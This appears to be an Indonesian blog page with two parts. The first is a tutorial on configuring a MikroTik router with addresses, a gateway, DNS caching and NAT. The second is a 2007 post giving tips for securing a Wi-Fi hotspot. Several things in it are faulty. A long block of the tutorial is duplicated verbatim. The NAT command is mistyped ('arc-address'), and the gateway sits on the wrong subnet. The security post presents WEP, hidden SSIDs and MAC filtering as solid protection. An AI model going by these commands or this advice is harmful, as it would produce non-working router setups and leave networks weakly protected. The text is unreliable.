Jika muncul tanda kesalahan, ada dua alasan:

pertama : Ada kemungkinan LAN Card yang terpasang, rusak

kedua : Driver dari LAN Card belum disupport oleh Mikrotik

Untuk Melihat kedua LAN Card yang terpasang(apakah sudah komplit dua), ketikkan .............

[admin@mywifi] > ip address

[admin@mywifi] ip address > interface print (atau perintah tersebut bisa disingkat menjadi" in pr " )

Lalu tampillah kedua LAN Card, perhatikan konsole diatas menandakan kita sudah berada pada direktori ip address

Berdasar tampilan monitor Mikrotik LAN Card pertama bernama "ether1" dimana ether1 ini nantinya terkoneksi ke IP Public/Internet sedang LAN Card kedua bernama "ether2" ini terkoneksi ke IP Local/LAN Lokal, kemudian kita memberi ip address pada masing-masing LAN Card, dengan perintah/command sebagai berikut :

[admin@mywifi] > ip address

[admin@mywifi] ip address > add interface=ether1 address=172.16.0.254/24

[admin@mywifi] ip address > add interface=ether2 address=192.168.1.254/24


Untuk mengetahui hasilnya ketikkan:


[admin@mywifi] ip address > print

Lihat hasilnya pada gambar diatas. untuk naik ke direktori yang lebih tinggi ketikkan titik dua " .. " , atau " / " ke direktori admin, yang merupakan direktori tertinggi.

Lalu kita mengisi ip address gateway dari LAN Card yang pertama, yakni dimana kita mendapat akses internet

[admin@mywifi] > ip route add gateway=192.168.1.1

Selanjutnya kita mengisi ip address DNS, isikan sesuai rekomendasi dari ISP anda,

[admin@mywifi] > ip dns set primary-dns=202.134.1.7

admin@mywifi] > ip dns set secondary-dns=202.134.0.155

Agar semua komputer client dalam LAN bisa lebih cepat browsing internet dengan cukup mengambil cache DNS pada router Mikrotik, jadi komputer client tidak berlu jauh-jauh meresolve DNS pada Server DNS ISP, maka Router Mikrotik perlu diset agar bisa melakukan penyimpanan cache DNS

[admin@mywifi] > ip dns set allow-remote-request=yes

Tapi semua komputer client, pada setting IP Address nya diisi kolom DNS primary, dengan IP Address nya Router Mikrotik, untuk secondary DNS nya biarkan saja kosong. Perhatikan pula gambar diatas apabila kita salah dalam mengetikkan perintah, maka akan muncul peringatan

"no such argument".

Selanjutnya kita mengeset agar mesin Mikrotik kita bisa menjadi router

[admin@mywifi] > ip firewall nat

[admin@mywifi] ip firewall nat> add chain=srcnat arc-address=192.168.1.0/24 out-interface=ether1 action=masquerade

Kita lihat hasilnya

[admin@mywifi] ip firewall nat> print

Lihat hasilnya pada monitor anda. untuk naik ke direktori yang lebih tinggi ketikkan titik dua " .. " , atau " / " ke direktori admin, yang merupakan direktori tertinggi.

Lalu kita mengisi ip address gateway dari LAN Card yang pertama, yakni dimana kita mendapat akses internet

[admin@mywifi] > ip route add gateway=192.168.1.1

Selanjutnya kita mengisi ip address DNS, isikan sesuai rekomendasi dari ISP anda,

[admin@mywifi] > ip dns set primary-dns=202.134.1.7

admin@mywifi] > ip dns set secondary-dns=202.134.0.155

Agar semua komputer client dalam LAN bisa lebih cepat browsing internet dengan cukup mengambil cache DNS pada router Mikrotik, jadi komputer client tidak berlu jauh-jauh meresolve DNS pada Server DNS ISP, maka Router Mikrotik perlu diset agar bisa melakukan penyimpanan cache DNS

[admin@mywifi] > ip dns set allow-remote-request=yes

Tapi semua komputer client, pada setting IP Address nya diisi kolom DNS primary, dengan IP Address nya Router Mikrotik, untuk secondary DNS nya biarkan saja kosong. Perhatikan pula gambar diatas apabila kita salah dalam mengetikkan perintah, maka akan muncul peringatan

"no such argument".

Selanjutnya kita mengeset agar mesin Mikrotik kita bisa menjadi router

[admin@mywifi] > ip firewall nat

[admin@mywifi] ip firewall nat> add chain=srcnat arc-address=192.168.1.0/24 out-interface=ether1 action=masquerade

Kita lihat hasilnya

[admin@mywifi] ip firewall nat> print

Nah pada tahap awal ini kita sudah bisa membuat Router Mikrotik, guna mengetahui hasilnya kita melakukan test ping( untuk perintah "ping" ini harus dilakukan pada direktori tertinggi yakni di direktori "admin") ke komputer client dari router Mikrotik kita, ketika muncul dalam proses ping tersebut ada kata-kata "ping time out" atau "host unreachable" maka kita tidak berhasil untuk koneksi, coba teliti kembali pada setting Mikrotik atau teliti pula konfigurasi ip address pada komputer client, kemudian coba pula ping ke alamat internet dari komputer client atau browsing dari komputer client, jika berhasil maka berhasil pula tugas kita membuat Router Mikrotik.



Thursday, August 9, 2007

Mengamankan Hotspot Anda



Era Wifi telah dimulai, bertambah semarak lagi perkembangan wifi di Indonesia sejak dibebaskannya frekuensi 2.4Ghz penggunaannya oleh pemerintah , so berbagai jaringan wifi/ hotspot mulai bertebaran di kota-kota besar di tanah air kita, namun perkembangan ini ditandai harap-harap cemas oleh para pemilik hotspot, takut kebobolan nih !!, pertanyaannya adalah bagaimana mengamankan atau meminimalkan resiko
keamanan dari hotspot kita, nih bung wifi, mau kasih saran :

1. Aktifkan penggunaan enkripsi WEP dan WPA anda, gunanya adalah agar tidak sembarang orang bisa
masuk, dengan sistem ini setiap komputer punya kewenangan berbicara dengan sesama anggota worgroupnya, diluar anggota "dilarang masuk" , WEP dan WPA juga mampu
mengamankan dari tindak "menyadap" lalu lintas data pada jaringan wifi anda , jadi data -data seperti username, paaword, rekening bank, surat cinta dll, Insya Allah bisa selamat, sebaiknya aktifkan WEP pada tingkat security yang maksimum misal 128 bit, dan gantilah passwordnya secara berkala, misal 3-4 hari sekali.
2. Sembunyikan Service Set Id (SSID) pada Akses Poin anda, karena dengan SSID diset Open, maka mudah ditemukan oleh orang lain yang melakukan scanning jaringan wifi, bisa jadi orang tersebut punya niat buruk untuk nyerobot masuk ke jaringan hotspot anda, nah lu!!!

3. Daftarkan MAC address komputer/laptop client anda, pada fitur MAC Address Filtering di akses poin anda, agar kompi lain yang ingin mengakses hotspot anda bisa terhalang, harus ijin dulu donk pada yang punya..............

4. Lakukan scanning pada kelas jaringan anda, siapa tahu, ada ip address lain yang asing yang sedang mengakses atau bercokol di network anda, karena itu gunakan ip address statis, jangan dinamis, lebih baik pula gunakan ip address yang berbeda antara akses poin dan dan jaringan lokal/gateway anda.

5. Yang terakhir, seringlah membaca di internet pada situs-situs yang membahas security, siapa tahu ada bug pada driver akses poin anda, seperti yang baru-barupf ini terjadi pada driver wifi notebook merk Apple yang memungkin bisa di attack secara remote, bila perlu update lah firmware device wifi anda, tapi hati-hati update firmware bisa menimbulkan resiko kerusakan perangkat wifi anda, carilah informasi sebelumnya.